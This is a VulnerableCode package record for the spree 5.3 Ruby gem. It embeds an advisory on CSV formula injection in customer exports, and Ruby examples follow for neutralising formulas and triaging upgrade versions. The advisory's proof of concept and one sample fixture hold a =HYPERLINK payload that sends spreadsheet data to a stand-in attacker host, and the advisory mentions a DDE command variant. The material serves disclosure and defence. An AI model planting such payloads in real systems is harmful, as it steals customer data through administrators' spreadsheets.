Package Instance
Look up vulnerable packages by Package URL (purl).
GET /api/packages/1076555?format=api
{
  "url": "http://public2.vulnerablecode.io/api/packages/1076555?format=api",
  "purl": "pkg:gem/spree@5.3",
  "type": "gem",
  "namespace": "",
  "name": "spree",
  "version": "5.3",
  "qualifiers": {},
  "subpath": "",
  "is_vulnerable": true,
  "next_non_vulnerable_version": null,
  "latest_non_vulnerable_version": null,
  "affected_by_vulnerabilities": [
    {
      "url": "http://public2.vulnerablecode.io/api/vulnerabilities/310104?format=api",
      "vulnerability_id": "VCID-153y-kwk2-xyfd",
      "summary": "Spree: CSV Formula Injection in Customer Export\n### Summary\n\nCSV formula injection (also known as formula injection or CSV injection) affects customer export. User-controlled values (customer names, email addresses, and shipping addresses) are written into the export file verbatim. When an administrator opens a crafted\nexport in Microsoft Excel or LibreOffice Calc, formulas embedded in user data execute in the\ncontext of the administrator's desktop, potentially exfiltrating data or executing OS commands\nvia DDE (Dynamic Data Exchange).\n\n---\n\n### Details\n\n#### Affected presenters and fields\n\n| Presenter | Path | User-controlled fields |\n|---|---|---|\n| `CustomerPresenter` | `spree/core/app/presenters/spree/csv/customer_presenter.rb:36` | `first_name`, `last_name`, `address1`, `address2`, `city`, `phone` |\n\n#### Vulnerable code — `customer_presenter.rb` (representative example)\n\n```ruby\n# spree/core/app/presenters/spree/csv/customer_presenter.rb:36–53\ndef call\n csv = [\n customer.first_name, # ← written verbatim; may contain =HYPERLINK(...)\n customer.last_name, # ← user-controlled\n customer.email, \n customer.accepts_email_marketing ? Spree.t(:say_yes) : Spree.t(:say_no),\n customer.address&.company, # ← user-controlled\n customer.address&.address1, # ← user-controlled\n customer.address&.address2, # ← user-controlled\n customer.address&.city, # ← user-controlled\n customer.address&.state_text,\n customer.address&.state_abbr,\n customer.address&.country&.name,\n customer.address&.country&.iso,\n customer.address&.zipcode,\n customer.phone, # ← user-controlled\n customer.amount_spent_in(Spree::Store.current.default_currency),\n customer.completed_orders.count,\n ]\n csv += metafields_for_csv(customer)\n csv\nend\n```\n\n---\n\n### PoC\n\n**Precondition**: A Spree store with public customer registration enabled (default\nconfiguration). No special permissions required for the attacker.\n\n#### Step 1 — Register as a customer with an injected first name\n\n```bash\ncurl -X POST https://store.example.com/api/v3/store/customers \\\n -H \"Content-Type: application/json\" \\\n -H \"X-Spree-Api-Key: pk_<publishable_api_key>\" \\\n -d '{\n \"email\": \"attacker@evil.com\",\n \"password\": \"password123\",\n \"password_confirmation\": \"password123\",\n \"first_name\": \"=HYPERLINK(\\\"http://attacker.example.com/exfil?d=\\\"&B1,\\\"Click\\\")\",\n \"last_name\": \"Smith\"\n }'\n```\n\n#### Step 2 — Admin triggers a customer export\n\n```bash\ncurl -X POST https://store.example.com/api/v3/admin/exports \\\n -H \"Authorization: Bearer <admin_jwt>\" \\\n -H \"Content-Type: application/json\" \\\n -d '{\"type\": \"Spree::Exports::Customers\", \"record_selection\": \"all\"}'\n```\n\n#### Step 3 — Admin polls until ready, then downloads\n\n```bash\n# Poll for completion\ncurl https://store.example.com/api/v3/admin/exports/<export_id> \\\n -H \"Authorization: Bearer <admin_jwt>\"\n\n# Download\ncurl https://store.example.com/api/v3/admin/exports/<export_id>/download \\\n -H \"Authorization: Bearer <admin_jwt>\" \\\n -o customers.csv\n```\n\n#### Step 4 — Verify injection in the raw CSV (without opening in Excel)\n\nOpen `customers.csv` in a text editor. The first data row will contain:\n\n```\n\"=HYPERLINK(\"\"http://attacker.example.com/exfil?d=\"\"&B1,\"\"Click\"\")\",\"Smith\",\"attacker@evil.com\",...\n```\n\n#### Step 5 — Admin opens `customers.csv` in Microsoft Excel (Windows)\n\n- Excel warns about external data connections; if the administrator clicks **Enable**, the\n `HYPERLINK` formula fires and sends a GET request to `http://attacker.example.com/exfil?d=<B1_value>`.\n- Cell B1 in the customers export is the **Last Name** column. Adjacent columns contain\n email, address, and order total data for all exported customers.\n- With the DDE variant (`=CMD|...`) on older or unpatched Excel versions, a subprocess\n is launched on the administrator's machine.\n\n---\n\n### Impact\n\n**Vulnerability class**: CSV / Formula Injection (CWE-1236)\n\n#### Who is impacted\n\n- **Administrators** who download and open export files in spreadsheet software are the\n direct victims. Administrative accounts have access to all store data, payment method\n configurations, customer PII, and full order history.\n\n#### Realistic attack chain\n\n| Step | Actor | Action | Privilege required |\n|---|---|---|---|\n| 1 | Attacker | Registers as customer | Public registration |\n| 2 | Attacker | Sets `first_name` to formula payload | None beyond registration |\n| 3 | Admin | Runs a routine weekly/monthly export | Normal operational task |\n| 4 | Admin | Opens CSV in Excel | None |\n| 5 | Attacker | Receives exfiltrated spreadsheet data | Passive |\n\n#### Data at risk\n\nAll data visible to the administrator in the spreadsheet at the time of opening, including:\n\n- All exported customer emails, names, addresses, phone numbers\n- Order totals and purchase history\n- Any other columns in the same export file",
      "references": [
        {
          "reference_url": "https://github.com/spree/spree",
          "reference_id": "",
          "reference_type": "",
          "scores": [
            {
              "value": "5.2",
              "scoring_system": "cvssv4",
              "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:A/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H"
            },
            {
              "value": "MODERATE",
              "scoring_system": "generic_textual",
              "scoring_elements": ""
            }
          ],
          "url": "https://github.com/spree/spree"
        },
        {
          "reference_url": "https://github.com/spree/spree/releases/tag/v5.2.8",
          "reference_id": "",
          "reference_type": "",
          "scores": [
            {
              "value": "5.2",
              "scoring_system": "cvssv4",
              "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:A/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H"
            },
            {
              "value": "MODERATE",
              "scoring_system": "generic_textual",
              "scoring_elements": ""
            }
          ],
          "url": "https://github.com/spree/spree/releases/tag/v5.2.8"
        },
        {
          "reference_url": "https://github.com/spree/spree/releases/tag/v5.3.6",
          "reference_id": "",
          "reference_type": "",
          "scores": [
            {
              "value": "5.2",
              "scoring_system": "cvssv4",
              "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:A/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H"
            },
            {
              "value": "MODERATE",
              "scoring_system": "generic_textual",
              "scoring_elements": ""
            }
          ],
          "url": "https://github.com/spree/spree/releases/tag/v5.3.6"
        },
        {
          "reference_url": "https://github.com/spree/spree/releases/tag/v5.4.3",
          "reference_id": "",
          "reference_type": "",
          "scores": [
            {
              "value": "5.2",
              "scoring_system": "cvssv4",
              "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:A/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H"
            },
            {
              "value": "MODERATE",
              "scoring_system": "generic_textual",
              "scoring_elements": ""
            }
          ],
          "url": "https://github.com/spree/spree/releases/tag/v5.4.3"
        },
        {
          "reference_url": "https://github.com/spree/spree/security/advisories/GHSA-xf4v-w5x5-pv79",
          "reference_id": "",
          "reference_type": "",
          "scores": [
            {
              "value": "MODERATE",
              "scoring_system": "cvssv3.1_qr",
              "scoring_elements": ""
            },
            {
              "value": "5.2",
              "scoring_system": "cvssv4",
              "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:A/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H"
            },
            {
              "value": "MODERATE",
              "scoring_system": "generic_textual",
              "scoring_elements": ""
            }
          ],
          "url": "https://github.com/spree/spree/security/advisories/GHSA-xf4v-w5x5-pv79"
        },
        {
          "reference_url": "https://github.com/advisories/GHSA-xf4v-w5x5-pv79",
          "reference_id": "GHSA-xf4v-w5x5-pv79",
          "reference_type": "",
          "scores": [
            {
              "value": "MODERATE",
              "scoring_system": "cvssv3.1_qr",
              "scoring_elements": ""
            }
          ],
          "url": "https://github.com/advisories/GHSA-xf4v-w5x5-pv79"
        }
      ],
      "fixed_packages": [
        {
          "url": "http://public2.vulnerablecode.io/api/packages/506694?format=api",
          "purl": "pkg:gem/spree@5.3.6",
          "is_vulnerable": true,
          "affected_by_vulnerabilities": [
            {
              "vulnerability": "VCID-153y-kwk2-xyfd"
            }
          ],
          "resource_url": "http://public2.vulnerablecode.io/packages/pkg:gem/spree@5.3.6"
        },
        {
          "url": "http://public2.vulnerablecode.io/api/packages/506695?format=api",
          "purl": "pkg:gem/spree@5.4.3",
          "is_vulnerable": true,
          "affected_by_vulnerabilities": [
            {
              "vulnerability": "VCID-153y-kwk2-xyfd"
            }
          ],
          "resource_url": "http://public2.vulnerablecode.io/packages/pkg:gem/spree@5.4.3"
        }
      ],
      "aliases": [
        "GHSA-xf4v-w5x5-pv79"
      ],
      "risk_score": 3.1,
      "exploitability": "0.5",
      "weighted_severity": "6.2",
      "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-153y-kwk2-xyfd"
    }
  ],
  "fixing_vulnerabilities": [],
  "risk_score": "3.1",
  "resource_url": "http://public2.vulnerablecode.io/packages/pkg:gem/spree@5.3"
}
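The advisory quoted in the summary field above shows the presenter writing user-controlled cells verbatim and a raw-CSV check (its step 4), but not what a fix looks like. The Ruby below is an example added here; it is not Spree's code nor the fix Spree shipped in the referenced releases. It puts a row builder shaped like the advisory's presenter next to a hardened one, and adds a text-only scanner that does the step 4 check without opening a spreadsheet. The Customer struct, the reduced field set, the header names and the two sample records are constructed for the example; the single-quote prefix is one standard neutralisation for CWE-1236, chosen here because it survives round trips through Excel and LibreOffice Calc.

```ruby
require "csv"

# Constructed stand-in for the customer record the Spree presenter reads.
# It is not Spree's model; only fields the advisory flags as user-controlled are kept.
Customer = Struct.new(:first_name, :last_name, :email, :address1, :city, :phone,
                      keyword_init: true)

# Leading characters that make Excel and LibreOffice Calc evaluate a cell as a formula.
# "+" and "-" are included because they start formulas too ("-1+1", "+cmd|...").
FORMULA_TRIGGERS = ["=", "+", "-", "@"].freeze

# True when a spreadsheet would evaluate this cell. Leading whitespace (spaces, tabs,
# carriage returns) is discarded first, which errs toward flagging: importers differ in
# whether they trim it, and a tab or CR before "=" is a known bypass of naive checks.
def formula_like?(value)
  return false unless value.is_a?(String)
  first = value.lstrip[0]
  !first.nil? && FORMULA_TRIGGERS.include?(first)
end

# Neutralisation used here: prefix a single quote so the spreadsheet stores the cell as
# text. The quote stays visible to the spreadsheet user, but nothing can execute.
def neutralize_formula(value)
  formula_like?(value) ? "'#{value}" : value
end

# Row shape mirroring the advisory's presenter: values are emitted exactly as received.
def csv_row_unsafe(customer)
  [customer.first_name, customer.last_name, customer.email,
   customer.address1, customer.city, customer.phone]
end

# Hardened row: every cell passes through neutralize_formula before serialisation.
def csv_row_hardened(customer)
  csv_row_unsafe(customer).map { |cell| neutralize_formula(cell) }
end

HEADER = ["First Name", "Last Name", "Email", "Address 1", "City", "Phone"].freeze

# Build the export text. CSV.generate does the quoting (embedded quotes are doubled),
# which is why the raw file in the advisory's step 4 shows "" around the URL.
def export_csv(customers, hardened:)
  CSV.generate do |csv|
    csv << HEADER
    customers.each do |c|
      csv << (hardened ? csv_row_hardened(c) : csv_row_unsafe(c))
    end
  end
end

# Step 4 without a spreadsheet: return [row, column] of every cell a spreadsheet would
# evaluate. Row 0 is the header row, so data rows start at 1.
def scan_csv_for_formulas(csv_text)
  hits = []
  CSV.parse(csv_text).each_with_index do |row, r|
    row.each_with_index { |cell, c| hits << [r, c] if formula_like?(cell) }
  end
  hits
end

# Constructed sample input: the advisory's payload in first_name, plus a benign customer
# whose phone number starts with "+" (a real-world cell that the check also flags).
ATTACKER = Customer.new(
  first_name: '=HYPERLINK("http://attacker.example.com/exfil?d="&B1,"Click")',
  last_name: "Smith", email: "attacker@evil.com",
  address1: "1 Nowhere St", city: "Springfield", phone: "555-0100"
)
BENIGN = Customer.new(
  first_name: "Ada", last_name: "Lovelace", email: "ada@example.com",
  address1: "12 Analytical Way", city: "London", phone: "+44 20 7946 0000"
)

if __FILE__ == $PROGRAM_NAME
  unsafe = export_csv([ATTACKER, BENIGN], hardened: false)
  puts "unsafe export flags cells at #{scan_csv_for_formulas(unsafe).inspect}"
  puts unsafe
  puts export_csv([ATTACKER, BENIGN], hardened: true)
end
```

Running it shows the unsafe export flagging two cells, the injected first name and the benign "+44" phone number; the hardened export flags none, because both now begin with a quote. That second hit is the trade-off to decide on before shipping this: a quote prefix on international phone numbers is harmless in a spreadsheet but will surprise any downstream script that re-imports the CSV, so the neutralisation belongs at the export boundary, not in stored data.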
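Two details of the package record above matter when a scanner consumes it: next_non_vulnerable_version and latest_non_vulnerable_version are null even though fixed_packages lists 5.3.6 and 5.4.3, and both of those "fixed" packages carry is_vulnerable: true for the same VCID-153y-kwk2-xyfd. The Ruby below is an added example, not VulnerableCode's client code: it parses a constructed, abbreviated copy of this response (same purl, vulnerability id, aliases, fixed packages and flags; summary and references omitted), derives an upgrade target with Gem::Version, and treats the contradiction as a reason to return nothing rather than a version. The fetch_package helper assumes the ?purl= filter on the /api/packages/ list endpoint and a paginated "results" envelope; the page itself only shows the numeric instance URL.

```ruby
require "json"
require "net/http"
require "uri"

# Constructed, abbreviated copy of the record above (same ids, purls and flags).
SAMPLE_RESPONSE = <<~RESPONSE
  {
    "purl": "pkg:gem/spree@5.3",
    "version": "5.3",
    "is_vulnerable": true,
    "next_non_vulnerable_version": null,
    "latest_non_vulnerable_version": null,
    "affected_by_vulnerabilities": [
      {
        "vulnerability_id": "VCID-153y-kwk2-xyfd",
        "aliases": ["GHSA-xf4v-w5x5-pv79"],
        "risk_score": 3.1,
        "fixed_packages": [
          {"purl": "pkg:gem/spree@5.3.6", "is_vulnerable": true,
           "affected_by_vulnerabilities": [{"vulnerability": "VCID-153y-kwk2-xyfd"}]},
          {"purl": "pkg:gem/spree@5.4.3", "is_vulnerable": true,
           "affected_by_vulnerabilities": [{"vulnerability": "VCID-153y-kwk2-xyfd"}]}
        ]
      }
    ]
  }
RESPONSE

# Version component of a purl: the text after the last "@" of the part that precedes
# any qualifiers ("?...") or subpath ("#..."). Returns nil when the purl has no version.
def purl_version(purl)
  core = purl.split(/[?#]/, 2).first
  core.include?("@") ? core.split("@").last : nil
end

# Fixed versions per vulnerability id, as sorted Gem::Version objects (Gem::Version
# orders "5.3.6" after "5.3" correctly, which plain string comparison does not).
def fixed_versions_by_vuln(pkg)
  pkg.fetch("affected_by_vulnerabilities").each_with_object({}) do |vuln, acc|
    versions = vuln.fetch("fixed_packages", []).map { |fp| purl_version(fp["purl"]) }.compact
    acc[vuln["vulnerability_id"]] = versions.map { |v| Gem::Version.new(v) }.sort
  end
end

# True when a listed fixed package is itself flagged as affected by the same
# vulnerability, as 5.3.6 and 5.4.3 are in the record above.
def fixed_package_still_flagged?(fixed_pkg, vuln_id)
  fixed_pkg["is_vulnerable"] &&
    fixed_pkg.fetch("affected_by_vulnerabilities", []).any? { |a| a["vulnerability"] == vuln_id }
end

# Lowest fixed version above the queried one. With trust_flags: true (the default) a fixed
# package that the data also flags as vulnerable is skipped, so nil means "the record
# contradicts itself; read the advisory before upgrading".
def recommended_upgrade(pkg, trust_flags: true)
  current = Gem::Version.new(pkg.fetch("version"))
  candidates = pkg.fetch("affected_by_vulnerabilities").flat_map do |vuln|
    vuln.fetch("fixed_packages", [])
        .reject { |fp| trust_flags && fixed_package_still_flagged?(fp, vuln["vulnerability_id"]) }
        .map { |fp| purl_version(fp["purl"]) }
  end
  candidates.compact.map { |v| Gem::Version.new(v) }.select { |v| v > current }.min&.to_s
end

# Triage summary for one package record: ids with aliases, and both upgrade answers.
def triage(pkg)
  ids = pkg.fetch("affected_by_vulnerabilities").map do |v|
    [v["vulnerability_id"], *v.fetch("aliases", [])].join("/")
  end
  {
    purl: pkg["purl"],
    vulnerable: pkg["is_vulnerable"],
    vulnerabilities: ids,
    upgrade: recommended_upgrade(pkg),
    upgrade_if_flags_ignored: recommended_upgrade(pkg, trust_flags: false)
  }
end

# Live lookup by purl (assumed ?purl= filter on the list endpoint; host taken from the
# URLs on this page). Not exercised offline; returns the first matching record or nil.
def fetch_package(purl, base: "http://public2.vulnerablecode.io")
  uri = URI("#{base}/api/packages/?purl=#{URI.encode_www_form_component(purl)}")
  JSON.parse(Net::HTTP.get(uri)).fetch("results", []).first
end

if __FILE__ == $PROGRAM_NAME
  puts triage(JSON.parse(SAMPLE_RESPONSE)).inspect
end
```

On the sample, triage reports upgrade: nil and upgrade_if_flags_ignored: "5.3.6". The second value is what a naive "take the lowest fixed version" rule would emit; the first is the safer answer when the same record says the fix release is still affected, and it should send the reviewer to the GHSA-xf4v-w5x5-pv79 advisory and release notes linked in the references rather than to an automatic Gemfile bump.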